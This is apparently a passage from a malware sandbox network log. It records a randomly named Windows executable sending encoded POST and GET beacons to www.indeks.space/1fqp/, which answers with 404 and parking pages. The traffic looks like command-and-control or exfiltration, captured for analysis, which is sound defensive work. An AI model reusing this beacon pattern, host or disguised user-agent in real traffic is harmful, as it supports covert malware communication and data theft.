51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:41.623519897 CEST1239INData Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1
                                                                                  Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~|I|}Jy\M:WlN?


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.11.2049821194.58.112.174805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:44.168339968 CEST1128OUTPOST /1fqp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Origin: http://www.indeks.space
                                                                                  Referer: http://www.indeks.space/1fqp/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 73 53 44 37 64 47 75 78 74 77 61 32 51 66 68 6f 76 4d 64 5a 36 55 37 34 54 58 6b 45 71 79 47 66 73 36 33 4a 69 48 67 38 51 79 59 50 70 44 5a 72 4c 47 48 63 46 74 61 6f 46 72 42 56 79 59 59 43 46 55 62 4d 2f 66 49 75 63 34 48 6e 79 42 74 62 4d 31 55 50 48 62 7a 61 74 41 38 43 46 76 64 68 53 4f 57 74 2b 76 4b 50 41 63 4e 35 45 69 54 62 32 64 59 61 73 5a 30 67 50 54 2f 6b 37 73 30 79 37 65 6d 77 76 43 72 4f 54 56 38 74 32 33 71 6a 53 4f 46 6f 31 78 75 52 53 65 67 55 77 5a 33 67 6d 44 6a 4b 49 6e 70 78 77 70 2b 31 56 56 44 68 67 31 56 76 4f 48 37 49 4b 4c 4d 78 37 6f 6a 5a 61 39 37 36 47 44 75 76 38 51 47 72 77 62 2f 34 41 54 54 71 42 43 36 65 48 47 6f 37 49 39 65 43 45 43 41 51 30 50 67 47 78 55 72 6d 59 49 42 2b 54 63 4a 37 66 5a 57 56 44 41 66 36 55 6b 54 2b 67 6d 6b 74 4f 31 66 55 62 59 76 74 54 70 38 2f 43 4a 2b 64 71 57 4d 59 4c 43 4e 5a 6f 32 77 4d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXsSD7dGuxtwa2QfhovMdZ6U74TXkEqyGfs63JiHg8QyYPpDZrLGHcFtaoFrBVyYYCFUbM/fIuc4HnyBtbM1UPHbzatA8CFvdhSOWt+vKPAcN5EiTb2dYasZ0gPT/k7s0y7emwvCrOTV8t23qjSOFo1xuRSegUwZ3gmDjKInpxwp+1VVDhg1VvOH7IKLMx7ojZa976GDuv8QGrwb/4ATTqBC6eHGo7I9eCECAQ0PgGxUrmYIB+TcJ7fZWVDAf6UkT+gmktO1fUbYvtTp8/CJ+dqWMYLCNZo2wMc0qqfR+UKJKo36oXX/X0haHjjABidlbfoN0JpL8RHFoC0gu99YXJW8g61el0i8Uad6ad8SIpABisbTUkmIDbWixdPPqlhcaI43HD1huE0SnWmwMHZFvjesFTF2cLgNl9p0m+hCmuCB/0tRa9fn9WwXkpycoL1Hq6OsUeG1alKpfCHzRxCeARe3Yl57WQJSnYpBN02DLQH4akEc=
                                                                                  Aug 27, 2024 17:47:44.401834965 CEST1289INData Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8
                                                                                  Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
                                                                                  Aug 27, 2024 17:47:44.401949883 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:44 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:44.401973009 CEST1239INData Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1
                                                                                  Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~|I|}Jy\M:WlN?


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.11.2049822194.58.112.174805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:46.923988104 CEST2578OUTPOST /1fqp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Origin: http://www.indeks.space
                                                                                  Referer: http://www.indeks.space/1fqp/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 71 4b 44 37 50 4f 75 2b 71 45 61 31 51 66 68 6c 50 4d 63 5a 36 56 70 34 54 76 6f 45 71 2b 73 66 76 43 33 4a 7a 58 67 39 6c 75 59 61 5a 44 63 31 37 47 46 59 46 74 4f 6f 46 75 62 56 79 64 6a 43 55 51 62 4e 34 6a 49 35 50 51 47 72 43 42 52 62 4d 31 41 46 6e 62 37 61 74 4d 73 43 41 33 64 68 58 57 57 74 4e 58 4b 44 7a 6b 4e 6d 30 69 51 52 57 64 48 50 63 5a 4e 67 50 32 47 6b 37 73 6b 79 36 4b 6d 77 74 4b 72 50 56 64 2f 73 57 33 71 38 69 4f 47 73 31 39 79 52 55 37 2f 55 77 74 33 67 68 2f 6a 4c 6f 6e 70 33 52 70 39 78 31 56 4e 6c 67 30 50 6c 75 37 7a 49 4c 76 79 78 2b 59 6a 65 71 70 37 35 52 76 75 69 35 6b 47 77 77 62 78 38 41 53 66 67 68 43 6d 65 44 62 42 37 4c 6b 6c 43 44 43 41 52 55 76 67 54 67 56 39 77 6f 49 44 37 54 64 44 2f 66 46 61 56 44 51 44 36 55 6b 44 2b 68 69 6b 74 64 74 66 56 66 30 75 75 44 70 2f 79 69 4a 76 55 4b 53 4b 59 4c 4f 57 5a 6f 75 61 4d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXqKD7POu+qEa1QfhlPMcZ6Vp4TvoEq+sfvC3JzXg9luYaZDc17GFYFtOoFubVydjCUQbN4jI5PQGrCBRbM1AFnb7atMsCA3dhXWWtNXKDzkNm0iQRWdHPcZNgP2Gk7sky6KmwtKrPVd/sW3q8iOGs19yRU7/Uwt3gh/jLonp3Rp9x1VNlg0Plu7zILvyx+Yjeqp75Rvui5kGwwbx8ASfghCmeDbB7LklCDCARUvgTgV9woID7TdD/fFaVDQD6UkD+hiktdtfVf0uuDp/yiJvUKSKYLOWZouaMaUqr/R+E9dJmH6va3/BpxaQjjMrichteZh0LZb8VXFnUkgymNYZfm8g6yWX0iwUbvqaP/KI/nViubTWkmIobWuSdPHAlkUwI6bHEnJuHxygAGwzQJFGnehFTDSqLgcH9eEm9gymqCB+i9QS1/mmBhr4pyBdL1zD6J4USgsl/KZaYmWZ1zm3Xvn3jrDrX66IQeZA8nffNlAB5TrwUWjmtefVDCV9a9uoeN+XbaNcMS0UhKOLi8R/O4bVagcVwksQSNZCTUOYXGD8ba5l2PfO8JCWtpm9hMUnj4K4KyoNYD/qItcxJOgILnvzEzRvGw4wVw22Q+BAembw9c1lLxvUn0Sc80ZenLc8VheuBs9mdgKfLE8qZCuisf82k//gg9gebDIRckqKsv18w4bIAsUvGFHEbd9iFnr64hE8TCRr2wm8Gz/XTTobrJ/dnZpR69aKHuRx1nPwMIjUFOT0t02VjnicObBXX+SGfpTGQ2gv+jw+dL2TfYneAVgJb8cOvhPU0eiYE0fAQbvGIGH5ZaBI/KVsXZJIUEAQcpzARhiKMInrLtoI1zF+w0YYHV3gEy6p6GscgLLpiOz8SIVvhAACgCGSG1tAeDtMyz3YNx10vbe1novqjeASDPL5QxfjCUvMtjpxWq5MqIY4oxwpFjuv42V8wygCUrDRIpd [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:46.924006939 CEST3867OUTData Raw: 49 2f 34 65 56 75 64 61 4d 4e 52 46 64 2b 4b 6d 41 50 49 4a 2f 64 41 49 47 42 67 65 72 56 2b 66 32 4f 42 77 56 73 6f 48 6d 38 47 43 6d 6d 68 4c 66 79 63 6e 6a 37 51 77 73 7a 48 47 32 41 47 69 6e 34 5a 72 6d 50 6d 51 64 65 51 64 30 4e 66 2f 32 34
                                                                                  Data Ascii: I/4eVudaMNRFd+KmAPIJ/dAIGBgerV+f2OBwVsoHm8GCmmhLfycnj7QwszHG2AGin4ZrmPmQdeQd0Nf/24x0hYRm3yk6HwDuS+rUz+kpbwWai5cqEqQpaG3NdOyNLab9IrWENNRVEITdSlKlwwEXDdFx1w6XaiPodBBRfrz/cMeCBbrKmEgIGuewRLMg4z1amITjA6iHqQt4IcAtzPb53ydcNIaVCx6SiRzNWpyUcABRO81eKh0
                                                                                  Aug 27, 2024 17:47:47.146655083 CEST1289OUTData Raw: 52 35 68 43 51 45 2b 53 43 37 67 6b 2f 52 68 4a 58 56 34 44 35 66 78 4f 48 6c 36 63 59 6e 30 59 4a 4b 6d 76 77 42 47 45 59 65 5a 72 4b 53 79 38 51 48 65 59 32 77 2b 72 56 6a 51 63 46 45 71 51 78 6a 43 41 50 32 36 42 66 36 2b 65 36 6e 47 63 36 59
                                                                                  Data Ascii: R5hCQE+SC7gk/RhJXV4D5fxOHl6cYn0YJKmvwBGEYeZrKSy8QHeY2w+rVjQcFEqQxjCAP26Bf6+e6nGc6YQeuvQvMdg7aSiTSZJ97iOURgnkMLZu4OHiL1DKjObSK8Wu6Bmgttchwkm3lrvVj7sR9yXF1ZJFC1JoWEd3kb1VyBApCgL+cE6hyeFVnEuqLZhz5+OVW0D2ZoneEBpa18mKEfoQG+MpW73eeuQ9d3rIaX5FVAkfT16
                                                                                  Aug 27, 2024 17:47:47.147047043 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:47.147166014 CEST1289INData Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8
                                                                                  Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
                                                                                  Aug 27, 2024 17:47:47.147181034 CEST1239INData Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1
                                                                                  Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~|I|}Jy\M:WlN?
                                                                                  Aug 27, 2024 17:47:47.147238016 CEST1289OUTData Raw: 63 74 4a 6c 4d 49 63 72 48 53 6d 65 45 55 6b 54 4d 31 4d 74 4b 77 33 73 78 47 6e 76 4c 50 37 72 33 32 6f 6d 36 79 73 74 67 56 65 53 67 48 72 6a 70 35 48 5a 57 6e 6a 64 62 36 53 43 6a 52 63 6c 71 5a 39 67 45 55 77 54 72 4d 59 52 4b 71 56 4d 4f 4c
                                                                                  Data Ascii: ctJlMIcrHSmeEUkTM1MtKw3sxGnvLP7r32om6ystgVeSgHrjp5HZWnjdb6SCjRclqZ9gEUwTrMYRKqVMOLf6WgUlw/LL5W6HHbETSOOwXQUDbiLhBJbUf1VCiOyOvmmQdxWPB4ODTFPX9bxOLQ9ZQL+sE6oJL6Aq9j3QwPeEL4Inq6fQd9lkq58nr+6A0rhguoWk7v0RDAXTRMrboGEZ9VuJqCFRacK+dfccmLP5Gx0Twgv354m
                                                                                  Aug 27, 2024 17:47:47.147474051 CEST2578OUTData Raw: 62 51 33 46 4e 6e 73 5a 4c 47 2f 56 2b 45 51 6a 65 67 44 6f 6f 36 4a 7a 74 56 72 57 4a 5a 2b 62 73 73 65 49 64 32 70 33 43 76 73 53 4f 42 65 38 63 47 54 44 4b 39 68 4d 45 41 4a 6a 6e 6e 46 58 6f 70 67 4f 33 4f 4b 35 47 73 62 79 57 6c 6a 4d 53 34
                                                                                  Data Ascii: bQ3FNnsZLG/V+EQjegDoo6JztVrWJZ+bsseId2p3CvsSOBe8cGTDK9hMEAJjnnFXopgO3OK5GsbyWljMS4cHf57ccbidNQASCGdHpiUPb9INJ3grEItwTAEyQeHkqe0hjfYUD6bmtzADwArryTU+/wdxRV9mHnAqHdqS9cAfYrXJY1+b9zmHf1C9B9fY3ZJtqjrRlvrJgtBvH/XefHauG+hR8wCvJ/+VnqeNGWjIqDWhYDtWe/F
                                                                                  Aug 27, 2024 17:47:47.188894033 CEST1289OUTData Raw: 6f 31 6d 52 51 57 61 4e 6c 49 47 76 6b 2f 33 7a 51 65 46 74 41 52 47 2f 68 6d 39 72 36 31 41 69 67 30 2b 48 45 56 76 4c 66 77 76 74 64 76 6e 65 47 59 34 6c 2b 37 47 63 4a 6c 59 2f 6a 37 70 36 51 79 71 68 72 58 31 54 74 48 7a 4d 6e 4e 77 70 6f 65
                                                                                  Data Ascii: o1mRQWaNlIGvk/3zQeFtARG/hm9r61Aig0+HEVvLfwvtdvneGY4l+7GcJlY/j7p6QyqhrX1TtHzMnNwpoeVlF2bEpSKTMHYWJyQAvRFaQMFlZEd2/J7nYcnuEQ0h/11gD3rNADSKZ68sHd8YV92nJsfbZtNDm0/uqM1okfF1DAVBW+xRa5hT1vFc0tBLidevFqFKXrVTgVA/wF1hIEXNUZI5sf/AxA+A1LXzk+XM/PZnKTYxDaX
                                                                                  Aug 27, 2024 17:47:47.372658014 CEST1289OUTData Raw: 37 4d 58 34 6f 74 73 79 57 64 2f 4b 74 33 70 2b 46 35 66 76 43 34 36 41 34 4b 4e 6b 47 69 4c 41 41 30 62 79 6d 57 79 64 50 65 70 4c 42 64 70 69 65 58 4d 55 30 64 39 6f 52 5a 44 53 54 6a 41 57 68 44 73 59 49 51 7a 4d 50 66 37 76 35 36 65 6c 65 43
                                                                                  Data Ascii: 7MX4otsyWd/Kt3p+F5fvC46A4KNkGiLAA0bymWydPepLBdpieXMU0d9oRZDSTjAWhDsYIQzMPf7v56eleCN/IZUBvjfaYkAtCGgngdkSHUqXgD+dxvFTNewykATdRLYYsCaoNKntTuKYZIkAustXJfOtJfM13tDLLMO+nSTscYmaMrzp0N1JF61LmXmeYtLoUyYNhegPJhUeEpOqx/lmjGVbhGs5ZYZRvbAezo+0Amk6dWdiyhW
                                                                                  Aug 27, 2024 17:47:47.372858047 CEST1289OUTData Raw: 2f 63 51 4a 66 4a 62 71 6d 71 54 30 50 55 7a 4d 6f 45 4b 38 69 75 54 46 5a 41 4f 49 4e 6b 4b 4d 43 49 68 37 37 7a 5a 50 6d 72 4e 43 49 4b 5a 72 57 4f 36 42 56 32 49 32 68 32 46 68 55 34 56 30 4d 45 53 50 4b 52 55 68 42 53 47 54 51 56 72 5a 69 53
                                                                                  Data Ascii: /cQJfJbqmqT0PUzMoEK8iuTFZAOINkKMCIh77zZPmrNCIKZrWO6BV2I2h2FhU4V0MESPKRUhBSGTQVrZiS6aAwowurX8k/T6zJYJaGofwxc0C2oJ4f20OYYoJdhO9YvEFexaQGndSJeM1kuluxn76hZVthkg89d+Ee4x5qDAvTk/TuNCF1XsrYTdqnuSox/bnSbczPU2MQ5op2tLrfYl7+vLOhw/gG1k/EWnez6ShcRQs0FrsBl
                                                                                  Aug 27, 2024 17:47:47.411923885 CEST2578OUTData Raw: 69 72 31 51 79 4d 36 49 34 67 47 61 54 4d 6a 58 59 4d 44 64 49 7a 75 76 48 42 63 37 4a 63 6f 76 63 41 38 6d 63 62 67 59 6c 43 7a 73 66 78 68 64 6c 30 44 35 31 53 6e 48 37 4d 35 76 48 55 4e 49 66 69 75 58 55 2f 6f 37 30 7a 67 4e 72 4e 49 6c 2f 52
                                                                                  Data Ascii: ir1QyM6I4gGaTMjXYMDdIzuvHBc7JcovcA8mcbgYlCzsfxhdl0D51SnH7M5vHUNIfiuXU/o70zgNrNIl/RNKOHwopRE0ygdUUOCTFcg7YAORoHYyYJJ/Kk/xfCzkJ5F9FGfRw5i2kR+no2oqIfKofbndnCtBCs8XNnUeyxFqhsOl3B/GvvkkVXpMq7Pw4KdsxVFLUyTv2xEhYhWibBPo1A2cmD5fgvIcsV8fwCOL/TLyeZu0AbN


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.11.2049823194.58.112.174805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:49.687769890 CEST525OUTGET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:47:49.912497044 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Data Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 [TRUNCATED]
                                                                                  Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.indeks.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]
